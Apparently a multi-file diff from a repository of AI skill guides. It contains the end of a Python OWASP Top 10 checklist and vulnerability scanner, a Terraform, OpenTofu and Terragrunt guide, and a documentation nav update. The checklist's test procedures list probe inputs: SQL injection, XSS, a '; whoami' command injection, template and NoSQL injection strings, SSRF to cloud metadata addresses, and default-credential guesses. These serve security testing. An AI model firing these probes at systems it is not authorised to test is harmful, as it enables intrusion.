                      "Vertical Privilege Escalation",
                      "Verify regular users cannot access admin endpoints.",
                      "Authenticate as regular user, request admin endpoints. Expect 403.",
                      "critical", ["web", "api", "all"]),
            CheckItem("A01", "Broken Access Control", "A01-03",
                      "CORS Misconfiguration",
                      "Verify CORS policy does not allow arbitrary origins.",
                      "Send request with Origin: https://evil.com. Check Access-Control-Allow-Origin.",
                      "high", ["web", "api"]),
            CheckItem("A01", "Broken Access Control", "A01-04",
                      "Forced Browsing",
                      "Check for unprotected admin or debug pages.",
                      "Request /admin, /debug, /api/admin, /.env, /swagger. Expect 403 or 404.",
                      "high", ["web", "all"]),
            CheckItem("A01", "Broken Access Control", "A01-05",
                      "Directory Listing",
                      "Verify directory listing is disabled on the web server.",
                      "Request directory paths without index file. Should not list contents.",
                      "medium", ["web"]),

            # A02: Cryptographic Failures
            CheckItem("A02", "Cryptographic Failures", "A02-01",
                      "TLS Version Check",
                      "Ensure TLS 1.2+ is enforced. Reject TLS 1.0/1.1.",
                      "Run: nmap --script ssl-enum-ciphers -p 443 target.com",
                      "high", ["web", "api", "all"]),
            CheckItem("A02", "Cryptographic Failures", "A02-02",
                      "Password Hashing Algorithm",
                      "Verify passwords use bcrypt/scrypt/argon2 with adequate cost.",
                      "Review authentication code for hashing implementation.",
                      "critical", ["web", "api", "all"]),
            CheckItem("A02", "Cryptographic Failures", "A02-03",
                      "Sensitive Data in URLs",
                      "Check for tokens, passwords, or PII in query parameters.",
                      "Review access logs and URL patterns for sensitive query params.",
                      "high", ["web", "api"]),
            CheckItem("A02", "Cryptographic Failures", "A02-04",
                      "HSTS Header",
                      "Verify Strict-Transport-Security header is present.",
                      "Check response headers for HSTS with max-age >= 31536000.",
                      "medium", ["web"]),

            # A03: Injection
            CheckItem("A03", "Injection", "A03-01",
                      "SQL Injection",
                      "Test input fields for SQL injection vulnerabilities.",
                      "Submit ' OR 1=1-- in input fields. Check for errors or unexpected behavior.",
                      "critical", ["web", "api", "all"]),
            CheckItem("A03", "Injection", "A03-02",
                      "XSS (Cross-Site Scripting)",
                      "Test for reflected, stored, and DOM-based XSS.",
                      "Submit <script>alert(1)</script> in input fields. Check if rendered.",
                      "high", ["web", "all"]),
            CheckItem("A03", "Injection", "A03-03",
                      "Command Injection",
                      "Test for OS command injection in input fields.",
                      "Submit ; whoami in fields that may trigger system commands.",
                      "critical", ["web", "api"]),
            CheckItem("A03", "Injection", "A03-04",
                      "Template Injection",
                      "Test for server-side template injection.",
                      "Submit {{7*7}} and ${7*7} in input fields. Check for 49 in response.",
                      "high", ["web", "api"]),
            CheckItem("A03", "Injection", "A03-05",
                      "NoSQL Injection",
                      "Test for NoSQL injection in JSON inputs.",
                      "Submit {\"$gt\": \"\"} in JSON fields. Check for data leakage.",
                      "high", ["api"]),

            # A04: Insecure Design
            CheckItem("A04", "Insecure Design", "A04-01",
                      "Rate Limiting on Authentication",
                      "Verify rate limiting exists on login and password reset endpoints.",
                      "Send 50+ rapid login requests. Expect 429 after threshold.",
                      "high", ["web", "api", "all"]),
            CheckItem("A04", "Insecure Design", "A04-02",
                      "Business Logic Abuse",
                      "Test for business logic flaws (negative quantities, state manipulation).",
                      "Try negative values, skip steps in workflows, manipulate client-side calculations.",
                      "high", ["web", "api"]),
            CheckItem("A04", "Insecure Design", "A04-03",
                      "Account Lockout",
                      "Verify account lockout after repeated failed login attempts.",
                      "Submit 10+ failed login attempts. Check for lockout or CAPTCHA.",
                      "medium", ["web", "api"]),

            # A05: Security Misconfiguration
            CheckItem("A05", "Security Misconfiguration", "A05-01",
                      "Default Credentials",
                      "Check for default credentials on admin panels and services.",
                      "Try admin:admin, root:root, admin:password on all login forms.",
                      "critical", ["web", "api", "all"]),
            CheckItem("A05", "Security Misconfiguration", "A05-02",
                      "Debug Mode in Production",
                      "Verify debug mode is disabled in production.",
                      "Trigger errors and check for stack traces, debug info, or verbose errors.",
                      "high", ["web", "api", "all"]),
            CheckItem("A05", "Security Misconfiguration", "A05-03",
                      "Security Headers",
                      "Verify all security headers are present and properly configured.",
                      "Check for CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy.",
                      "medium", ["web"]),
            CheckItem("A05", "Security Misconfiguration", "A05-04",
                      "Unnecessary HTTP Methods",
                      "Verify only required HTTP methods are enabled.",
                      "Send OPTIONS request. Check for TRACE, DELETE on public endpoints.",
                      "low", ["web", "api"]),

            # A06: Vulnerable Components
            CheckItem("A06", "Vulnerable and Outdated Components", "A06-01",
                      "Dependency CVE Audit",
                      "Scan all dependencies for known CVEs.",
                      "Run npm audit, pip audit, govulncheck, or bundle audit.",
                      "high", ["web", "api", "mobile", "all"]),
            CheckItem("A06", "Vulnerable and Outdated Components", "A06-02",
                      "End-of-Life Framework Check",
                      "Verify no EOL frameworks or languages are in use.",
                      "Check framework versions against vendor EOL dates.",
                      "medium", ["web", "api", "all"]),

            # A07: Authentication Failures
            CheckItem("A07", "Identification and Authentication Failures", "A07-01",
                      "Brute Force Protection",
                      "Verify brute force protection on authentication endpoints.",
                      "Send 100 rapid login attempts. Expect blocking after threshold.",
                      "high", ["web", "api", "all"]),
            CheckItem("A07", "Identification and Authentication Failures", "A07-02",
                      "Session Management",
                      "Verify sessions are properly managed (HttpOnly, Secure, SameSite).",
                      "Check cookie flags: HttpOnly, Secure, SameSite=Strict|Lax.",
                      "high", ["web"]),
            CheckItem("A07", "Identification and Authentication Failures", "A07-03",
                      "Session Invalidation on Logout",
                      "Verify sessions are invalidated on logout.",
                      "Logout, then replay the session cookie. Should receive 401.",
                      "high", ["web", "api"]),
            CheckItem("A07", "Identification and Authentication Failures", "A07-04",
                      "Username Enumeration",
                      "Check for username enumeration via error messages.",
                      "Submit valid and invalid usernames. Error messages should be identical.",
                      "medium", ["web", "api"]),

            # A08: Data Integrity
            CheckItem("A08", "Software and Data Integrity Failures", "A08-01",
                      "Unsafe Deserialization",
                      "Check for unsafe deserialization of user input.",
                      "Review code for pickle.load(), yaml.load(), Java ObjectInputStream.",
                      "critical", ["web", "api"]),
            CheckItem("A08", "Software and Data Integrity Failures", "A08-02",
                      "Subresource Integrity",
                      "Verify SRI hashes on CDN-loaded scripts and stylesheets.",
                      "Check <script> and <link> tags for integrity attributes.",
                      "medium", ["web"]),

            # A09: Logging Failures
            CheckItem("A09", "Security Logging and Monitoring Failures", "A09-01",
                      "Authentication Event Logging",
                      "Verify login success and failure events are logged.",
                      "Attempt valid and invalid logins. Check server logs for entries.",
                      "medium", ["web", "api", "all"]),
            CheckItem("A09", "Security Logging and Monitoring Failures", "A09-02",
                      "Sensitive Data in Logs",
                      "Verify passwords, tokens, and PII are not logged.",
                      "Review log configuration and sample log output for sensitive data.",
                      "high", ["web", "api", "all"]),

            # A10: SSRF
            CheckItem("A10", "Server-Side Request Forgery", "A10-01",
                      "Internal Network Access via SSRF",
                      "Test URL input fields for SSRF vulnerabilities.",
                      "Submit http://169.254.169.254/ and http://127.0.0.1 in URL fields.",
                      "critical", ["web", "api"]),
            CheckItem("A10", "Server-Side Request Forgery", "A10-02",
                      "DNS Rebinding",
                      "Test for DNS rebinding attacks on URL validators.",
                      "Use a DNS rebinding service to bypass allowlist validation.",
                      "high", ["web", "api"]),
        ]
        return checks


def format_checklist_text(checks: List[CheckItem]) -> str:
|
||||
"""Format checklist as human-readable text."""
|
||||
lines = []
|
||||
lines.append("=" * 70)
|
||||
lines.append("OWASP TOP 10 SECURITY CHECKLIST")
|
||||
lines.append(f"Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}")
|
||||
lines.append(f"Total checks: {len(checks)}")
|
||||
lines.append("=" * 70)
|
||||
|
||||
current_category = ""
|
||||
for check in checks:
|
||||
if check.owasp_category != current_category:
|
||||
current_category = check.owasp_category
|
||||
lines.append(f"\n--- {check.owasp_id}: {check.owasp_category} ---\n")
|
||||
sev_marker = {"critical": "[!!!]", "high": "[!! ]", "medium": "[! ]", "low": "[. ]", "info": "[ ]"}
|
||||
marker = sev_marker.get(check.severity, "[ ]")
|
||||
lines.append(f" {marker} [{check.check_id}] {check.title}")
|
||||
lines.append(f" {check.description}")
|
||||
lines.append(f" Test: {check.test_procedure}")
|
||||
lines.append(f" Severity: {check.severity.upper()}")
|
||||
lines.append("")
|
||||
return "\n".join(lines)
|
||||
|
||||
|
||||
def format_findings_text(findings: List[SourceFinding]) -> str:
|
||||
"""Format source findings as human-readable text."""
|
||||
if not findings:
|
||||
return "No vulnerability patterns detected in source code."
|
||||
lines = []
|
||||
lines.append(f"\nSOURCE CODE FINDINGS: {len(findings)} issue(s) found\n")
|
||||
by_severity = {"critical": [], "high": [], "medium": [], "low": [], "info": []}
|
||||
for f in findings:
|
||||
by_severity.get(f.severity, by_severity["info"]).append(f)
|
||||
for sev in ["critical", "high", "medium", "low", "info"]:
|
||||
group = by_severity[sev]
|
||||
if not group:
|
||||
continue
|
||||
lines.append(f" [{sev.upper()}] ({len(group)} finding(s))")
|
||||
for f in group:
|
||||
lines.append(f" - {f.title} [{f.rule_id}]")
|
||||
lines.append(f" File: {f.file_path}:{f.line_number}")
|
||||
lines.append(f" Code: {f.code_snippet}")
|
||||
lines.append(f" Fix: {f.recommendation}")
|
||||
lines.append("")
|
||||
return "\n".join(lines)
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(
|
||||
description="Vulnerability Scanner — Generate OWASP Top 10 checklists and scan source code for vulnerability patterns.",
|
||||
formatter_class=argparse.RawDescriptionHelpFormatter,
|
||||
epilog="""
|
||||
Examples:
|
||||
%(prog)s --target web --scope full
|
||||
%(prog)s --target api --scope quick --json
|
||||
%(prog)s --target web --source /path/to/code --scope full
|
||||
%(prog)s --target mobile --scope quick --json
|
||||
""",
|
||||
)
|
||||
parser.add_argument("--target", choices=["web", "api", "mobile"], default="web",
|
||||
help="Target application type (default: web)")
|
||||
parser.add_argument("--scope", choices=["quick", "full"], default="full",
|
||||
help="Scan scope: quick (high/critical only) or full (default: full)")
|
||||
parser.add_argument("--source", metavar="PATH",
|
||||
help="Optional: path to source code directory to scan for patterns")
|
||||
parser.add_argument("--json", action="store_true", dest="json_output",
|
||||
help="Output results as JSON")
|
||||
args = parser.parse_args()
|
||||
|
||||
scanner = VulnerabilityScanner(target=args.target, scope=args.scope)
|
||||
checklist = scanner.generate_checklist()
|
||||
|
||||
source_findings = []
|
||||
if args.source:
|
||||
source_findings = scanner.scan_source(args.source)
|
||||
|
||||
if args.json_output:
|
||||
output = {
|
||||
"scan_metadata": {
|
||||
"target": args.target,
|
||||
"scope": args.scope,
|
||||
"source_path": args.source,
|
||||
"generated_at": datetime.now().isoformat(),
|
||||
"checklist_count": len(checklist),
|
||||
"source_findings_count": len(source_findings),
|
||||
},
|
||||
"checklist": [asdict(c) for c in checklist],
|
||||
"source_findings": [asdict(f) for f in source_findings],
|
||||
}
|
||||
print(json.dumps(output, indent=2))
|
||||
else:
|
||||
print(format_checklist_text(checklist))
|
||||
if source_findings:
|
||||
print(format_findings_text(source_findings))
|
||||
elif args.source:
|
||||
print("\nNo vulnerability patterns detected in source code.")
|
||||
|
||||
# Exit with non-zero if critical/high findings found in source scan
|
||||
critical_high = [f for f in source_findings if f.severity in ("critical", "high")]
|
||||
if critical_high:
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -459,6 +459,259 @@ Flag these without being asked:
---

## Multi-Cloud Provider Configuration

When a single root module must provision across AWS, Azure, and GCP simultaneously.

### Provider Aliasing Pattern

```hcl
terraform {
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~> 5.0"
    }
    azurerm = {
      source  = "hashicorp/azurerm"
      version = "~> 3.0"
    }
    google = {
      source  = "hashicorp/google"
      version = "~> 5.0"
    }
  }
}

provider "aws" {
  region = var.aws_region
}

provider "azurerm" {
  features {}
  subscription_id = var.azure_subscription_id
}

provider "google" {
  project = var.gcp_project_id
  region  = var.gcp_region
}
```

### Shared Variables Across Providers

```hcl
variable "environment" {
  description = "Environment name used across all providers"
  type        = string
  validation {
    condition     = contains(["dev", "staging", "prod"], var.environment)
    error_message = "Must be dev, staging, or prod."
  }
}

locals {
  common_tags = {
    environment = var.environment
    managed_by  = "terraform"
    project     = var.project_name
  }
}
```
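The shared locals can then be referenced from resources in every provider. A sketch, with illustrative resource names (note that the Google provider uses `labels` rather than `tags`):

```hcl
resource "aws_s3_bucket" "artifacts" {
  bucket = "${var.project_name}-artifacts"
  tags   = local.common_tags
}

resource "azurerm_resource_group" "main" {
  name     = "${var.project_name}-${var.environment}"
  location = "westeurope"
  tags     = local.common_tags
}

resource "google_storage_bucket" "artifacts" {
  name     = "${var.gcp_project_id}-artifacts"
  location = var.gcp_region
  labels   = local.common_tags  # GCP labels require lowercase keys and values
}
```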
### When to Use Multi-Cloud

- **Yes**: Regulatory requirements mandate data residency across providers, or the org has existing workloads on multiple clouds.
- **No**: "Avoiding vendor lock-in" alone is not sufficient justification. Multi-cloud doubles operational complexity. Prefer single-cloud unless there is a concrete business requirement.

---

## OpenTofu Compatibility

OpenTofu is an open-source fork of Terraform maintained by the Linux Foundation under the MPL 2.0 license.

### Migration from Terraform to OpenTofu

```bash
# 1. Install OpenTofu
brew install opentofu          # macOS
snap install --classic tofu    # Linux

# 2. Replace the binary — state files are compatible
tofu init   # Re-initializes with OpenTofu
tofu plan   # Identical plan output
tofu apply  # Same apply workflow
```

### License Considerations

| | Terraform (1.6+) | OpenTofu |
|---|---|---|
| **License** | BSL 1.1 (source-available) | MPL 2.0 (open-source) |
| **Commercial use** | Restricted for competing products | Unrestricted |
| **Community governance** | HashiCorp | Linux Foundation |

### Feature Parity

OpenTofu tracks Terraform 1.6.x features. Key additions unique to OpenTofu:

- Client-side state encryption (configured via an `encryption` block in the `terraform` settings)
- Early variable/locals evaluation
- Provider-defined functions
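
A minimal sketch of client-side state encryption, based on the OpenTofu 1.7+ `encryption` block (key and method names are illustrative; check the OpenTofu documentation for your version):

```hcl
terraform {
  encryption {
    key_provider "pbkdf2" "main" {
      passphrase = var.state_passphrase  # supply via TF_VAR, never hardcode
    }
    method "aes_gcm" "default" {
      keys = key_provider.pbkdf2.main
    }
    state {
      method = method.aes_gcm.default
    }
  }
}
```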
### When to Choose OpenTofu

- You need a fully open-source license for your supply chain.
- You want client-side state encryption without Terraform Cloud.
- Otherwise, either tool works — the HCL syntax and provider ecosystem are identical.

---

## Infracost Integration

Infracost estimates cloud costs from Terraform code before resources are provisioned.

### PR Workflow

```bash
# Show cost breakdown for current code
infracost breakdown --path .

# Compare cost difference between current branch and main
infracost diff --path . --compare-to infracost-base.json
```

### GitHub Actions Cost Comment

```yaml
# .github/workflows/infracost.yml
name: Infracost
on: [pull_request]

jobs:
  cost:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: infracost/actions/setup@v3
        with:
          api-key: ${{ secrets.INFRACOST_API_KEY }}
      - run: infracost breakdown --path ./terraform --format json --out-file /tmp/infracost.json
      - run: infracost comment github --path /tmp/infracost.json --repo $GITHUB_REPOSITORY --pull-request ${{ github.event.pull_request.number }} --github-token ${{ secrets.GITHUB_TOKEN }} --behavior update
```

### Budget Thresholds and Cost Policy

```yaml
# infracost.yml — policy file
version: 0.1
policies:
  - path: "*"
    max_monthly_cost: "5000"   # Fail PR if estimated cost exceeds $5,000/month
    max_cost_increase: "500"   # Fail PR if cost increase exceeds $500/month
```

---

## Import Existing Infrastructure

Bring manually-created resources under Terraform management.

### terraform import Workflow

```bash
# 1. Write the resource block first (an empty body is fine)
# main.tf:
#   resource "aws_s3_bucket" "legacy" {}

# 2. Import the resource into state
terraform import aws_s3_bucket.legacy my-existing-bucket-name

# 3. Run plan to see the attribute diff
terraform plan

# 4. Fill in the resource block until plan shows no changes
```

### Bulk Import with Config Generation (Terraform 1.5+)

```bash
# Generate HCL for resources declared in import blocks
terraform plan -generate-config-out=generated.tf

# Review generated.tf, then move resources into proper files
```
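Config generation only covers resources declared in `import` blocks (Terraform 1.5+). A minimal sketch, reusing the bucket from the workflow above:

```hcl
# import.tf — declares which existing resources to bring under management
import {
  to = aws_s3_bucket.legacy
  id = "my-existing-bucket-name"
}
```

Unlike `terraform import`, these blocks are plannable and reviewable: the import happens on the next `terraform apply`, and the blocks can be deleted once the resources are in state.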
### Common Pitfalls

- **Resource drift after import**: The imported resource may have attributes Terraform does not manage. Run `terraform plan` immediately and resolve every diff.
- **State manipulation**: Use `terraform state mv` to rename or reorganize. Use `terraform state rm` to remove without destroying. Always back up state before manipulation: `terraform state pull > backup.tfstate`.
- **Sensitive defaults**: Imported resources may expose secrets in state. Restrict state access and enable encryption.

---

## Terragrunt Patterns

Terragrunt is a thin wrapper around Terraform that provides DRY configuration for multi-environment setups.

### Root terragrunt.hcl (Shared Config)

```hcl
# terragrunt.hcl (root)
remote_state {
  backend = "s3"
  generate = {
    path      = "backend.tf"
    if_exists = "overwrite_terragrunt"
  }
  config = {
    bucket         = "my-org-terraform-state"
    key            = "${path_relative_to_include()}/terraform.tfstate"
    region         = "us-east-1"
    encrypt        = true
    dynamodb_table = "terraform-locks"
  }
}
```

### Child terragrunt.hcl (Environment Override)

```hcl
# prod/vpc/terragrunt.hcl
include "root" {
  path = find_in_parent_folders()
}

terraform {
  source = "../../modules/vpc"
}

inputs = {
  environment = "prod"
  cidr_block  = "10.0.0.0/16"
}
```

### Dependencies Between Modules

```hcl
# prod/eks/terragrunt.hcl
dependency "vpc" {
  config_path = "../vpc"
}

inputs = {
  vpc_id     = dependency.vpc.outputs.vpc_id
  subnet_ids = dependency.vpc.outputs.private_subnet_ids
}
```
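Dependency outputs only exist after the upstream module has been applied. Terragrunt's `mock_outputs` lets `plan` and `validate` run before that; a sketch (mock values are placeholders):

```hcl
# prod/eks/terragrunt.hcl
dependency "vpc" {
  config_path = "../vpc"

  # Placeholder outputs so plan/validate work before the VPC is applied
  mock_outputs = {
    vpc_id             = "vpc-00000000"
    private_subnet_ids = ["subnet-00000000"]
  }
  mock_outputs_allowed_terraform_commands = ["plan", "validate"]
}
```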
### When Terragrunt Adds Value

- **Yes**: 3+ environments with identical module structure, shared backend config, or cross-module dependencies.
- **No**: Single environment, small team, or simple directory-based isolation already works. Terragrunt adds a learning curve and another binary to manage.

---

## Installation

### One-liner (any tool)

@@ -122,6 +122,7 @@ nav:
      - Overview: skills/engineering-team/index.md
      - "A11y Audit": skills/engineering-team/a11y-audit.md
      - "AWS Solution Architect": skills/engineering-team/aws-solution-architect.md
      - "Azure Cloud Architect": skills/engineering-team/azure-cloud-architect.md
      - "Code Reviewer": skills/engineering-team/code-reviewer.md
      - "Email Template Builder": skills/engineering-team/email-template-builder.md
      - "Incident Commander": skills/engineering-team/incident-commander.md
@@ -158,6 +159,7 @@ nav:
      - "Senior QA Engineer": skills/engineering-team/senior-qa.md
      - "Senior SecOps Engineer": skills/engineering-team/senior-secops.md
      - "Senior Security Engineer": skills/engineering-team/senior-security.md
      - "Security Pen Testing": skills/engineering-team/security-pen-testing.md
      - "Stripe Integration Expert": skills/engineering-team/stripe-integration-expert.md
      - "TDD Guide": skills/engineering-team/tdd-guide.md
      - "Tech Stack Evaluator": skills/engineering-team/tech-stack-evaluator.md